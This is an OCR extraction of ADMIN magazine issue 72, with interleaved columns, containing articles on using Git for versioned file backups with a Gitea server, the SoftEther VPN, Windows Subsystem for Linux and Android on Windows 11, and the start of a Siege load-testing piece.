files on their local computer needs it works online and offline, this pop-
a viable backup and restore strategy ular open source application is more then send an update to the remote
that covers the following functions: or less a perfect backup program; repository. Git’s delta mechanism
Q Multilevel file versioning moreover, it is available for all com- will submit all missed commits from
Q Local backup mon operating systems. The backup the local repository so that the re-
Q Remote backup over local area format is openly documented – in- mote repository ends up containing
network (LAN) dependent of the operating system all intermediate steps.

30 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Git Versioned Backups TO O L S

Git is also very flexible when it for large repositories. Although it is not the directory with the files,
comes to restoring. You can conve- is not open source, Atlassian pro- but a text file with the link to the
niently access previous versions of vides its Git client Sourcetree [3] external directory (i.e., it acts inde-
individual files or entire directories free of charge (Figure 1). The client pendently from the operating system
at the command line or in one of the can be used for both development and filesystem).
many available Git user interfaces and backup repositories. Git Exten- In this example, you will be creating a
(UIs). When doing so, you do not sions [4] offers a somewhat older, Git repository inside the regular user
need to overwrite the existing ver- technically overloaded look and feel directory for documents and using a
sion but can save an earlier version (Figure 2). In return, this free client USB drive with driver letter H: for the
under a different name. You also is extremely fast and includes many object store:
have a wide choice of Git servers features.
and, here too, you can view, modify, If you use the Eclipse development mkdir h:\git_backup
or download individual files on the environment, the JGit tool, written in cd %HOMEPATH%\Documents
web UI, if required. Java, is included. Unlike the conven- git init --separate-git-dir=h:\git_backup
tional Git client, JGit also handles the git add -A

Git on Windows Amazon Simple Storage Service (S3)


protocol. If you want to store your re- If you have not used Git on the
The Git homepage offers a setup for pository somewhere instead of, or in system before, the tool will ask you
Git on Windows [2]. In addition addition to, the regular Git server, you for global variables such as your
to the plain vanilla command-line can use JGit to move directly into an username and email address; then,
(CLI) tool for the Windows prompt S3-compatible object store. it creates the object directory on the
and PowerShell, Git also provides USB drive. Depending on the volume
the necessary OpenSSL libraries and Distributing Local Git of data in the document directory,
tools and a MinGW environment, this step can take some time. In this
the native Windows port of the GNU For version control, Git creates the setup, Git writes its data at a rate of
Compiler Collection (GCC), that lets versioned repository in the .git about 1.2GB per minute. The speed
Windows administrators run Git from subdirectory within the folder to also depends on whether Git needs
the command line or in PowerShell, be backed up. However, this does to write small or large files. Dur-
as well as in Git Bash. not work for the backup scenario ing the write process you will see a
Windows also has a number of here. The key to success is the number of warnings, such as:
graphical UI (GUI) tools for Git. The --separate-git-dir parameter when
popular GitHub Desktop is primar- creating the repository, which tells warning: LF will be replaced by CRLF
ily aimed at application developers; Git not to create the object store for in <filename>
however, this tool does not give you versioning in the directory, but on
a very good overview, especially a different path. In this case, .git This message refers to the old di-
lemma that *nix systems define the
end of line (LF, line feed) in a text
file differently from Windows (CRLF,
carriage return-line feed). Because
Git works independent of the operat-
ing system, it always saves text files
within the object memory in *nix
format but leaves the original file un-
changed. This automatic conversion
should not bother you unless you
are restoring a text file stored in Git
without the Git tool. For example, if
you download a text file from your re-
pository over HTTP from a Git server
with a web UI, no CRLF reconversion
takes place.
Now that Git has copied all the data
to the local repository, you can create
a snapshot of the current state with a
commit:
Figure 1: Atlassian’s free tool Sourcetree provides insights into local and remote Git
snapshots. git commit -m "Repository created"

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 31
TO O L S Git Versioned Backups

Now, if you make changes to files, a name that you pass in with the -m an automatic task that performs the
Git tracks them and saves them for parameter – in this case Repository backup regularly (e.g., every hour),
the next commit. Each commit is created. Later, you can see in the Git but keep in mind that Git, like any
given a unique ID and, for clarity, history exactly which files changed other program, cannot include open
in which commit, but if you add files in the snapshot. Of course, the
Listing 1: git restore new files to the directory, Git does script can be prettified – for example,
not automatically include them in to check first whether the USB target
type mysql_rev1.json
the repository. You need to run a git disk is connected to the system before
Unfortunately overwritten
add -A again before committing. To triggering the backup and initiating
git log mysql_rev1.json automate the process, create a suit- an upload to the server once a day.
commit 780... able batch file: Now, to restore a single file to a previ-
Author: Andreas .... ous state after an accidental change,
set commitname=U use git restore as in Listing 1.
2200404-1300 %date:~-4%U
... %date:~-7,2%U
Git Server Selection
%date:~-10,2%-U
git restore --source 780... mysql_rev1.json %time:~-11,2%U One of the most popular self-hosted
%time:~-8,2% Git servers is GitLab [5], which of
type mysql_rev1.json
set gitdir=%HOMEPATH%\Documents course also runs on the service at git-
{
cd %gitdir% lab.com. However, the massive GitLab,
"__inputs": [
{ git add -A written in Ruby, requires quite a bit of
"name": "MySQL", git commit -m "%commitname%" performance on the part of the server
"label": "MySQL", hardware. In return, GitLab delivers
"description": "MySQL Data Source", Now you can create a shortcut on the a wide range of functions, such as a
... desktop and trigger the backup at the wiki, a bug tracker, and an integrated
push of a button. Alternatively, create container image repository. If you only

Figure 2: In the Git Extensions open source tool, you can see the complete history of commits.

32 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Git Versioned Backups TO O L S

use a Git server as a backup target, in-house Git server Gogs but is main- accounts. To avoid the need to log
you don’t need all of these features tained by a somewhat more liberal in with a username and password,
and are better off with a simple, but developer community than the Google you will want to use SSH keys to au-
agile, Git server like Gitea [6], which original. Like Git itself, Gitea is avail- thenticate. The key pairs usually are
handles many databases and runs in able for all major platforms, so the generated with a centralized key man-
containers with low resource require- server service also runs smoothly on agement system and then assigned to
ments (Figure 3). For administrators Windows. All you need is an existing the users. In smaller environments,
with a predominantly Windows back- Git installation and a database. Gitea however, users on the client PCs can
ground, the free Bonobo [7] Git Server supports MySQL and PostgreSQL as create key pairs themselves with
in .NET integrates directly with Inter- well as Microsoft SQL Server (MSSQL) ssh-keygen. Remember always to keep
net Information Services (IIS). or, for simple test setups, SQLite. Of a copy of the SSH keys outside the
To create a second, remote backup course, Gitea can also be run in a Pod- client PC.
of a local repository, you need a Git man or Docker container. With the remote server running,
server. Here, too, you have a whole Once started, Gitea listens on ports you first log in to the Gitea UI with
range of open source offerings. Gitea is 3000 (HTTP) and 22 (SSH) by de- your user account, where you store
the simplest solution for newcomers. fault. In the simple and clear-cut web the public SSH key, if this has not
Written in Go, it derives from Google’s UI, you first need to create the user already been done elsewhere. In your

Figure 3: The simple Gitea Git server functions as a central backup server in the LAN or WAN.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 33
TO O L S Git Versioned Backups

account, you then create an empty to the in-house Git server is secure directory as its own repository from
repository for the backup data and even without a virtual private net- the underlying Git.
mark it as a Private repository. Gitea work (VPN). Either the web interface The user then backs up two re-
returns the appropriate SSH URL. of the Gitea server on port 3000 positories: The document directory
Now you can add the remote stor- should be protected by a reverse itself and the project. Thanks to
age path origin to the existing local proxy/load balancer with HTTPS Git’s group features, project data
repository, termination, or the service itself can be shared between workgroups
should run on HTTPS with a suit- and checked out to multiple clients.
git remote add origin U able certificate. To do this, modify When the project is completed, the
git@<Server>:<User/Repository>.git the configuration of Gitea in ./gitea/ clients can delete the local project
conf/app.ini and expand the follow- directory, and the Git server keeps all
and copy the local repository, in- ing section: the data as an archive that is avail-
cluding all previous commits, to the able to users at any time.
remote server: [server]
PROTOCOL = https
Conclusions
git push -u origin main ROOT_URL = https://<URL>:<Port>
HTTP_PORT = <Port> Backup and version control are
The -u lets you define the remote CERT_FILE = cert.pem closely related topics, so Git is a very
server origin as the default upstream KEY_FILE = key.pem good choice as a backup tool for user
server for the repository. Future data. Of course, Git does not back up
changes can then be sent to the origin Hosted Git services such as GitHub or the operating system or the installed
server with the git push command, GitLab are obviously out of the ques- applications or their configuration in
without any additional parameters. tion as backup targets because they the registry. Q
Git lets you specify multiple remote limit the size of the repositories.
repositories and use Info
Git in Git [1] Git: [https://git-scm.com]
git push <name> [2] Git for Windows:
Once you have familiarized yourself [https://git-scm.com/download/win]
to send the updates to different servers. with the Git tool, you can optimize [3] Sourcetree:
The Git server can run on the com- its use. For example, if you are just [https://www.sourcetreeapp.com]
pany LAN as well as on a cloud working on a project for a certain [4] Git Extensions:
system or in the demilitarized zone period of time, you can back up all [http://gitextensions.github.io]
(DMZ) with an Internet connection. related data to a separate directory [5] Download from GitLab:
Because communication between the and therefore to a separate Git. If the [https://about.gitlab.com/install/]
client and server relies on SSH en- folder is inside an existing repository, [6] Gitea: [https://gitea.io/en-us/]
cryption anyway, the cloud backup Git notices and excludes the project [7] Bonobo: [https://bonobogitserver.com]

34 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
TO O L S VPN with SoftEther

SoftEther VPN software

Speed in the Tunnel


speeds of more than 900Mbps. Per-
SoftEther is lean VPN software that outpaces the current king of the hill,
formance is achieved through utili-
OpenVPN, in terms of technology and performance. By Holger Reibold zation of the full Ethernet frame. At
the same time, the software reduces
In the age of home offices and dis- home gateways, facility routers, and memory copying, parallel transfer,
tributed locations, companies want firewalls. Firewalls that perform deep and clustering. The sum of these
security solutions that can be inte- packet inspection do not recognize measures significantly reduces latency
grated easily into existing infrastruc- SoftEther’s VPN transport packets as and massively boosts throughput.
tures, offer genuine added value, and VPN tunnels because HTTPS is used Another special feature of SoftEther,
secure communications between mo- to disguise the connection. Other its modular architecture, lets you ex-
bile clients and sites. OpenVPN was highlights include: pand the basic system to include ad-
long considered the measure of all Q Site-to-site and remote access VPN ditional functions, such as VPN Gate.
things VPN, but the business model connections Thanks to versatile protocol support,
was developed at the expense of the Q Access to restricted public wireless you usually don’t have to install the
community edition and has various local-area networks (WLANs) by SoftEther client. However, if you
restrictions. For example, the clas- VPN over Internet Control Message make intensive use of the VPN envi-
sic tool only supports its own virtual Protocol (ICMP) and VPN over DNS ronment, you will want to use the cli-
private network (VPN) protocol and Q Ethernet bridging and Layer 3 ent for performance reasons alone.
does not offer support for natively over VPN
integrated VPN clients from Android, Q Logging and firewalling in the SoftEther in Operation
iOS, macOS, and Windows. VPN tunnel
Q Support for relevant operating The name “SoftEther” points to the
Fast SoftEther Alternative systems (Windows, Linux, macOS, architecture of the VPN software: Vir-
Android, iOS) tualization creates a virtual Ethernet
SoftEther [1], whose name contains Q Cloning OpenVPN connections adapter and generates a switch that
elements of software and Ethernet, Q RADIUS/NT domain authentica- emulates a conventional Ethernet
has something to offer to counter the tion of users switch – in SoftEther terminology, it
aforementioned limitations. The open A table showing the direct compari- is referred to as a virtual hub. The
source VPN supports VPN protocols son between the two VPN applica- VPN connection is established by the
such as Secure Socket Layer (SSL) tions can be found online [2]. two components working together
Photo by Marc Sendra Martorell on Unsplash

VPN, the Layer 2 Tunneling Protocol Apart from purely technological over a virtual Ethernet cable.
(L2TP)/Internet Protocol Security aspects, the biggest benefit is fast The SoftEther version at the time of
(IPsec), OpenVPN, and Microsoft speed. On the basis of performance publication was 4.39. The installation
Secure Socket Tunneling Protocol protocols, various studies show that packages for the supported operating
(SSTP). SoftEther supports network OpenVPN has a data throughput of systems are available from the Soft-
address translation (NAT) traversal, less than 100Mbps, which often turns Ether download center [3]. The Soft-
which means you can run the VPN out to be a bottleneck. According to Ether server is at the core of the envi-
server on a machine located behind the developers, SoftEther provides ronment. It is especially easy to install

36 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
VPN with SoftEther TO O L S

on Windows, where the setup wizard name, password, and authentication are hidden behind the Advanced Set-
guides you through the various steps. method. If you are running a RADIUS tings button. You can significantly im-
During the install, you can choose be- server or Active Directory, specify the prove performance by increasing the
tween the server and the VPN bridge. associated username. You can also number of connections under Number
Server Manager is automatically use existing certificates. SoftEther is of TCP Connections (Figure 2). For
installed and supports centralized ad- now ready for use. broadband connections the value can
ministration of various SoftEther instal- handle up to 8 parallel connections;
lations. To configure the local SoftEther Installing the Client for dial-up connections you will want
infrastructure, you just connect to the to keep the default value 1.
VPN server with a single click and In principle, SoftEther lets you use the If sufficiently powerful systems are
specify a server-specific password. native VPN clients of today’s popular available on the client and server side,
The ease of working with SoftEther operating systems, but the SoftEther cli- enabling data compression by check-
soon becomes apparent (Figure 1). In ent is recommended for regular use of ing Use Data Compression can provide
the SoftEther VPN Server/Bridge Easy the VPN environment. The installation a significant performance boost. The
Setup dialog, you can choose from the packages are also available from the SoftEther VPN protocol can internally
two most common installation variants: download center. The installer sets up compress and transmit all Ethernet
Remote Access VPN Server or Site-to-Site a virtual network adapter and a back- frames sent and received. The Deflate
VPN Server to VPN Bridge. If you want ground service on the client side. As algorithm is used here. Data com-
to use advanced configurations such as with the SoftEther server, the client pro- pression reduces the communication
clustering, you need to do so manually. vides a VPN Client Manager that you volume by up to 80 percent, but com-
The setup dialog supports you in the use to manage various VPN connec- pression and decompression do cause
decision-making process, in that it tions and connection-specific settings. a significant increase in the compute
provides a visualization and brief de- To connect to the SoftEther server, load. Compression has its limits, how-
scription of the scenario in question double-click on Add VPN Connection ever: If the line speed exceeds 10Mbps,
with information relevant to decision in the Client Manager and assign a not compressing data often improves
making. In this article, I look at the name, the server data, the virtual communication speed. A final OK
remote access scenario, where the VPN network adapter to be used, and the accepts the connection settings, and
clients establish a secure connection to access data to the connection in the you can open a VPN to the SoftEther
the VPN server, allowing access to the associated New VPN Connection Set- server in the Client Manager just by
network behind it. Pressing Next in the ting Properties dialog. If required, you double-clicking.
setup wizard opens the hint dialog that can also use a proxy server. The Client Manager offers a wealth of
informs you the server is initialized. One highlight on the client side is the other practical features. For example,
You only have to confirm at this point advanced connection settings, which you can export and import connection
and proceed to assign a name to the
server configuration.
The setup wizard now reveals another
special feature. The VPN server has
a built-in dynamic DNS feature that
assigns a permanent DNS name to
the server, making it globally acces-
sible. Pressing Exit completes the basic
configuration and you can carry on
with the next step. You can integrate
the local VPN server with the Azure
Cloud Service (not to be confused with
Microsoft’s cloud service). VPN Azure
Cloud is a free cloud VPN service from
the SoftEther project. In the context
of this example, it is difficult to say
whether or not it makes sense to use
it. My recommendation is to disable
the associated function by selecting
Disable VPN Azure. Then press OK to
close this dialog.
The next step is to set up the first
SoftEther user by clicking on Create Figure 1: The user-friendly SoftEther server setup wizard has information on typical
Users and assigning a username, real deployment scenarios.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 37
TO O L S VPN with SoftEther

you a tabular over-


view with server in-
formation that spe-
cifically includes the
server type (usually
Standalone), the
operating system, a
plethora of general
server data, and
supported services
and functions.
For an overview of
the current state
of the server, press
the View Server
Status button; al-
ternatively, use the
ServerStatusGet
command at the
command line. The
overview shows
the number of ac-
tive sockets, virtual
Figure 2: The SoftEther Server Manager is the central interface to the VPN server instances. hubs, and sessions.
It also tells you how
settings for use on third-party systems Changes to the clustering configura- many users and groups were active
and create additional virtual adapter tion are the only tasks that require and what data volumes were trans-
and smart card configurations. The stopping the VPN service. ferred. To view the list of current con-
Client Manager tags the existing VPN For all administrative tasks, you can nections, click the Show List of TCP/
connections as Connected in the Sta- use the Server Manager or the vpncmd IP Connections button in the Server
tus column. You can access the con- console tool. SoftEther supports two Manager. Here, you can find out which
nection details by right-clicking on types of administrative permissions: clients have opened a VPN connection
the connection settings and selecting management authority for the entire to the SoftEther server and when the
the View Status command. VPN server and for virtual hubs. The connection was initialized.
server administrator should be identi- In practice, it is always useful to be
Managing SoftEther cal to the server computer admin. In able to take a look at the current con-
particular, the admin is responsible figuration file (e.g., to verify whether
Environments for managing the certificates and any configuration adjustments you
SoftEther server administrative op- ports. Furthermore, they have full have made have been implemented in
erations are divided into two types: access to the vpn_server.config Soft- the central system configuration). To
Server management and administra- Ether configuration file. In addition view the config file, press Edit Config.
tion of virtual hubs in a VPN server to server configuration, this file also The dialog box comes up with the
configuration. The developers placed contains the encrypted admin pass- text file but does not allow editing.
great emphasis on decoupling the word and the private key of the con- That said, you can restore the factory
VPN server process from configura- nection setup certificate, so it requires settings, save the configuration file, or
tion tweaks when designing the special protection. In the Windows load and enable an alternative file.
environments, which ensures that installation, only members of the Ad- The OpenVPN clone server feature is
VPN functionality is available without ministrator and SYSTEM groups have useful for organizations that are still
interruptions. read and write permissions; the same using OpenVPN but want to migrate
You only need to restart SoftEther applies on Unix-based systems. after evaluating SoftEther. You can
if the operating system requires use it to connect all OpenVPN clients,
you to do so, when the VPN server Administrative Tasks including iPhone and Android clients,
program is updated, when the to the SoftEther VPN server with mini-
server process is restarted because VPN Server Manager is the central mal overhead. The settings are hidden
of a hardware or software error, or interface for typical administrative behind the OpenVPN/MS-SSTP Setting
when you make manual changes to tasks. Pressing the About this VPN button. Proceeding is very easy: Just
the VPN server configuration file. Server button tells SoftEther to show enable the clone function and specify

38 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
VPN with SoftEther TO O L S

the UDP ports that OpenVPN uses. use the VPN server, a client, and a versatile support for VPN protocols,
SoftEther takes care of everything else. bridge. On the SoftEther server, create the above-average performance, and
You can then disconnect the OpenVPN multiple separate Ethernet segments; great convenience for users make Soft-
server from the network, but make the VPN server relies on a virtual Ether an attractive VPN alternative.
sure that cloning works reliably with Layer 3 switch function that provides Despite all the enthusiasm, certain
random tests beforehand. IP-based Layer 3 routing between limitations exist. Unlike OpenVPN,
L2 segments. An access control list SoftEther cannot operate as software as
SoftEther as a LAN Tester (ACL) function for packet filtering is a service (SaaS), and it tends to target
available for the virtual hub configu- small to medium-sized environments.
SoftEther can also be used to test and ration. You can use these L2 and L3 It also lacks a kill switch function and
simulate network configurations. For functions to test the network design. policy management. Another short-
example, SoftEther has a delay, jitter, The SoftEther software has a variety coming is that the developers do not
and packet loss generator that lets of other features that are of interest provide commercial support to date.
you simulate a network or network for enterprise use. For example, you That said, it would be a good thing for
segment in poor condition. To begin, can use the environment to imple- SoftEther to step out of the shadow of
define two local bridges from a virtual ment a virtual network with connec- OpenVPN and the like and find many
hub to two physical Ethernet network tivity to well-known cloud services. new friends in the admin community. Q
adapters. The two Ethernet network It is also possible to set up your own
segments are bridged by the virtual VPN-secured cloud. Info
hub, which introduces delay, jitter, [1] SoftEther: [https://www.softether.org]
and packet loss as it forwards Ether- Conclusions [2] SoftEther vs. OpenVPN:
net frames. The generator is particu- [https://www.vpnxd.com/softether-vs-
larly suitable for testing VoIP devices. SoftEther is excellent VPN software openvpn-which-one-better/]
To put such an Ethernet-based net- that makes many established tools [3] SoftEther download center: [https://www.
work topology through its paces, look old fashioned. In particular, softether-download.com/en.aspx]
TO O L S Windows Subsystems

Windows Subsystem for Linux and Android in Windows 11

Good Host
The Windows subsystem for Linux runs graphical applications on Windows 11 out of the box, and Windows
Subsystem for Android, out in preview at press time, shows that Windows can be a platform for Android
apps. We look at the state of the art and help you get started. By Christian Knermann

High-ranking Microsoft employees by no means designed to compete is the Windows Virtual Computer
publicly making disparaging remarks with established Linux distributions Platform feature, which also provides
about Linux is ancient history. Red- for general-purpose use. Microsoft the foundation for Hyper-V. Unlike
mond has changed its course 180 de- mainly uses its in-house distribution Hyper-V, however, WSL does not rely
grees and impressively demonstrated itself, following an approach that is on full virtualization, but on contain-
that its commitment to the develop- most comparable to Fedora CoreOS. ers. In concrete terms, this means that
ment of open source software is not CBL-Mariner, as a minimalist distri- not every Linux distribution installed
mere lip service. For example, GitHub, bution, is primarily geared toward in WSL will run on a fully virtualized
the platform for collaborative ver- running containers. It forms the machine, but all distributions share
sion management for countless free basis for the Azure Kubernetes Ser- a common kernel. The advantage is
projects, was acquired by Microsoft vices and other services in the Azure that WSL gets by with significantly
in 2018. However, Microsoft does not cloud. However, CBL-Mariner is not fewer resources than Hyper-V.
just operate the platform, it also ac- only relevant for Microsoft’s cloud That said, during my last visit to
tively contributes to many projects as activities, it now also handles tasks the site, some add-ons were still
one of the world’s largest open source under the hood of the Windows Sub- missing, and I had to resort to an X
providers. system for Linux (WSL). server on Windows to run graphical
Photo by Jack Hunter on Unsplash

Additionally, Microsoft has devel- Linux applications [2]. Native sup-


oped its own Linux distribution Graphical Linux Apps port for X11 and Wayland apps was
named CBL-Mariner – where CBL initially only found as a preview
stands for Common Base Linux – The second version of WSL sees Mi- in the Windows Insider program.
which you will find on GitHub, of crosoft place the subsystem on com- After the introduction of Win-
course [1]. However, CBL-Mariner is pletely new underpinnings. The basis dows 11, Microsoft has finalized the

40 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Windows Subsystems TO O L S

Windows Subsystem for Linux GUI but also those that require GPUs for wsl --set-version <name of distribution> 2
(WSLg) [3]. The basis for this is the machine learning (ML) or artificial wsl --shutdown
WSLg system distribution based on intelligence (AI) use cases. Micro-
CBL-Mariner (Figure 1), which runs soft has ported the DirectX 12 inter- and restart the subsystem.
Weston, the reference implementa- face to Linux for this purpose with
tion of the server for the Wayland its own kernel driver [4]. Two Approaches to a Fresh
remote display protocol that Mi-
crosoft has adapted for use with
Install
Upgrade from Windows 10
WSL and optimized for displaying If you start with a fresh installation of
individual applications instead of
to 11 Windows 11, on which WSL has not
entire desktop environments over Microsoft has reserved WSLg ex- run so far, two approaches can give you
the Remote Desktop Protocol (RDP). clusively for Windows 11 and has the desired state. Before you start, make
Besides Wayland applications, WSLg not backported it to Windows 10. sure that hardware virtualization is ac-
can also handle classic X11 applica- The good news is that if you own a tive in your system’s BIOS. The WSL
tions. The additional Pulse Audio Windows 11-capable device, you can setup does not check this state and
Server takes care of the bidirectional safely update. In the lab, existing responds with some less than meaning-
transmission of audio signals. Linux instances survived an upgrade ful hex code as an error message if you
When you work with WSL, you will installation from Windows 10 to 11 try to launch a Linux distribution. The
not see any of this architecture, without any complications. hardware virtualization is called Intel
which seems complex at first glance After an upgrade, just make sure VT-d/VT-x or AMD IOMMU, depending
but offers several advantages. The that WSL is up to date and that your on the processor manufacturer, but it
applications within your user dis- Linux instances are all using ver- can also be hidden under other terms
tributions, of which you can install sion 2 of the subsystem. You can do or in a submenu in the BIOS depend-
and run several in parallel, use their this at the command line with admin ing on the brand of your computer. If
familiar Linux interfaces without privileges and list all existing Linux in doubt, consult the manufacturer’s
customization. Windows, on the distributions by typing: documentation.
other hand, accesses them by RDP If hardware virtualization is active,
without having to worry about im- wsl --update you can pop up an admin command
plementing X11 or Wayland. In this wsl --list -v line and install WSL with just one
way, Linux applications can also use command that will do all the work
the host’s physical GPUs, if avail- If you find a distribution that has for you:
able. This setup not only benefits not yet moved to version 2, you can
graphically intensive applications, change that with wsl --install

Figure 1: The CBL-Mariner system distribution converts the Wayland and X11 display protocols to RDP.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 41
TO O L S Windows Subsystems

The command starts by installing currently still rates the app as a Windows user account and only ex-
the required Windows features, the preview. It gives you the identical ists within this Linux instance.
Virtual Computer Platform, and the feature set – just not as a Windows The usual shell commands let you
Windows Subsystem for Linux if feature, but as a state-of-the-art update Linux and install graphical
they are not already in place. You Store app. applications, such as the Gnome text
can also see this for yourself on Unlike the wsl command, however, editor or even the Mozilla Firefox web
Windows 11 in the legacy Control the Store app unfortunately does not browser:
Panel in Programs and Features | take care of dependencies. Without
Turn Windows features on or off. The the virtual machine platform, at- sudo apt update
setup routine then loads the current tempting to run a Linux distribution sudo apt upgrade
long-term support (LTS) version of ends up with a hex code error and a sudo apt install gedit -y
Ubuntu from the Microsoft Store as note to the effect that a required fea- sudo apt install firefox -y
the default distribution. If you prefer ture is not installed. You need to add
some other distribution, such as Kali this feature to Windows first from the When you’re done, you can see for
Linux, which is popular among fo- control panel or with yourself that graphical applications
rensic experts, try: not only launch from the shell but
dism.exe U also show up as subfolders in the
wsl --install --distribution kali /online U respective Linux distribution in the
/enable-feature U Start menu (Figure 2). WSL has
Although the advantage is that this /featurename:VirtualMachinePlatform U caught up with Google ChromeOS
command handles all the required /all and seamlessly integrates Linux apps
steps in one fell swoop, this approach into the Windows interface.
has a drawback. on a command line with admin File exchange between the two worlds
When installing with wsl.exe, the privileges. is bidirectional. You can access all your
subsystem itself and the Linux ker- Windows drives in WSL as mount-
nel use the Windows Update service WSLg in Action points (e.g., /mnt/c and /mnt/d). On
to retrieve updates and the operat- Windows, you will find the root filesys-
ing system; however, this approach After the obligatory reboot, you can tems of all your installed distributions
is no longer preferred by Microsoft. install a Linux distribution (e.g., in subfolders of the \\wsl$ virtual net-
Instead, Microsoft wants to decouple Ubuntu, Kali Linux) from the Micro- work share.
the updates for WSL from the oper- soft Store and then find it in the Start If you need graphical tools that do
ating system and deliver them from menu. When called for the first time, not exist as native applications for
the Microsoft Store [5]. You can WSL opens and initializes a shell for Windows or if you develop ML/AI
find WSL in the Microsoft Store as the Linux instance and prompts you use cases with Linux as the target
Windows Subsystem for Linux Pre- to specify a user and a password. platform, WSL on Windows 11 is a
view, but don’t worry that Microsoft This account is independent of your useful tool.

Figure 2: WSLg seamlessly integrates graphical Linux applications with Windows.

42 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Windows Subsystems TO O L S

systemd
The systemd init system has become
more or less the standard in most dis-
tributions. Unfortunately, at the time
of writing this article, in contrast to a
full-fledged Linux VM, WSL did not
have systemd and the common com-
mands like systemctl. Since then, sys-
temd for WSL has been released [6],
which will allow you, for example, to
start the classic trio of daemons for a
web server, script interpreter, and da-
tabase (e.g., Nginx, PHP, and MySQL).

USB Support over the


Network Figure 3: WSL uses USB/IP to access USB devices connected to Windows.
Maybe you need a smartcard reader
or you develop IoT applications and opposite side on Linux, the lsusb double-click. You can download the
want to configure a microcontroller command should confirm this, as the installer for WSA PacMan from the
over USB. In this case, you will unfor- smartcard reader example demon- project’s GitHub page [11] and in-
tunately notice that WSL cannot com- strates (Figure 3). After completing stall the software. It registers as the
municate directly with USB devices these steps, you can detach the device default for the APK file type if you
connected to Windows at the present again with the command: let it. After rebooting the system,
time. An indirect approach involving call the package manager from the
the USB/IP network protocol will help usbipd wsl attach --busid <ID> Start menu, which tells you that
you. In the past, you had to make com- WSA is not yet running and offers to
plex adjustments to the Linux kernel In this way, the WSL can be useful for start the subsystem.
to do this. But on Windows 11, current low-level development, as well. In the next step, download Android
instances of WSL 2 from kernel version packages from an alternative F-Droid
5.10.60.1 upward do this by default. Outlook on the Subsystem open source repository for Android
To begin, install the latest version of apps [12] or Aurora OSS [13] on Win-
usbipd-win as described on the proj-
for Android dows. Now, as soon as you double-
ect’s GitHub page [7] with a winget Much like the technical underpin- click on one of the downloads in APK
command or as an MSI package. Now nings for WSL, Microsoft is also look- format, WSA PacMan displays the
launch a Linux distribution and in- ing to run mobile apps for Android permissions the respective app re-
stall the appropriate tools for USB/IP on Windows with the Windows quests before proceeding to install the
there, too [8]: Subsystem for Android (WSA). In app in the subsystem. You will then
contrast to WSL, WSA is still in its find it in the Windows Start menu.
sudo apt install U infancy and was not offered until the Alternatively, you can call up An-
linux-tools-5.4.0-77-generic hwdata recent release of Windows 11 version droid’s app launcher from the pack-
sudo update-alternatives U 2022, aka Sun Valley 2. Unfortunately, age manager and install additional
--install /usr/local/bin/usbip usbip U by the editorial deadline, only a software from the alternative app
/usr/lib/linux-tools/5.4.0-77-generic/U fairly vague announcement had been stores, such as the privacy-oriented
usbip 20 released on Microsoft’s blog. Now, browser by search engine coders
however, the pre-release version of DuckDuckGo, which is then also
On the Windows side, list all the WSA is available in the Microsoft shown directly as a link in the Win-
available USB devices from an admin Store [9] [10]. dows Start menu.
command line and connect them to Even without the alternative app
the Linux environment: Retrofitting a Graphical stores, various online portals offer
you direct downloads of Android
usbipd wsl list
Package Manager packages beyond the official app
usbipd wsl attach --busid <ID> The WSA Package Manager (WSA stores by Google and Amazon. How-
PacMan, Figure 4) accesses the ever, be careful, because these offer-
Another list command shows that WSA developer interface and in- ings are not validated by the store
the device is connected. On the stalls Android packages with a providers, and you cannot rule out

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 43
TO O L S Windows Subsystems

the packages containing malware. outside the US market. Until then, [7] Download usbipd-win:
Notes on which Android apps work the preview lets you try out WSA. Q [https://github.com/dorssel/usbipd-win]
with WSA are also available on [8] usbipd-win and WSL: [https://github.com/
GitHub [14]. dorssel/usbipd-win/wiki/WSL-support]
Info [9] WSA with Amazon Appstore: [https://apps.
Conclusions [1] CBL-Mariner: [https://github.com/ microsoft.com/store/detail/windows-
microsoft/CBL-Mariner] subsystem-for-android(tm)-with-amazon-
Microsoft is continuously expand- [2] “Linux apps on Windows 10 and appstore/9P3395VX91NR]
ing WSL’s feature set. Under Win- Chrome OS” by Christian Kner- [10] Release Notes for WSA:
dows 11, the subsystem has already mann, ADMIN, issue 66, 2021, pg. [https://learn.microsoft.com/en-us/
reached a practical level of maturity 88, [https://www.admin-magazine. windows/android/wsa/release-notes]
that makes a full-fledged virtual or com/Archive/2021/66/Linux- [11] WSA PacMan: [https://github.com/
even physical machine unnecessary apps-on-Windows-10-and-Chrome-OS/] alesimula/wsa_pacman/releases]
for many Linux use cases. Graphical [3] Run Linux GUI apps on WSL: [12] F-Droid: [https://f-droid.org]
applications integrate seamlessly, [https://learn.microsoft.com/en-us/ [13] AuroraOSS : [https://auroraoss.com]
and even the systemd init system is windows/wsl/tutorials/gui-apps] [14] WSA-compatible apps: [https://github.
now available. [4] DirectX for WSL: [https:// com/riverar/wsa-app-compatibility]
In contrast, WSA is still in its in- devblogs.microsoft.com/directx/
fancy, but this new subsystem dem- directx-heart-linux/] Author
onstrates that Windows can be a [5] WSL in the Windows Store: Christian Knermann is
candidate as a platform for Android [https://devblogs.microsoft.com/ Head of IT-Management
apps. The practical benefits totally commandline/a-preview-of-wsl- at Fraunhofer UMSICHT, a
depend on the available apps. It in-the-microsoft-store-is-now-available/] German research institute.
remains to be seen whether Micro- [6] systemd for WSL: [https://devblogs. He's written freelance
soft and Amazon will expand their microsoft.com/commandline/systemd- about computing
offerings and open up to customers support-is-now-available-in-wsl/] technology since 2006.

Figure 4: WSA forms the basis for Android apps on Windows, and WSA PacMan helps with the install.

44 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
CONTAINERS AND VIRTUALIZATION Siege Benchmarking Tool

Load test your website with Siege

Stress
A stress and benchmarking tool for websites controlled from the your code will be stable in the worst
conditions. Surviving traffic spikes,
command line. By Ali Imran Nagori system crashes, memory overuse,
and so on are core milestones that
Monitoring the performance of a evaluates the following performance software needs to achieve. Siege
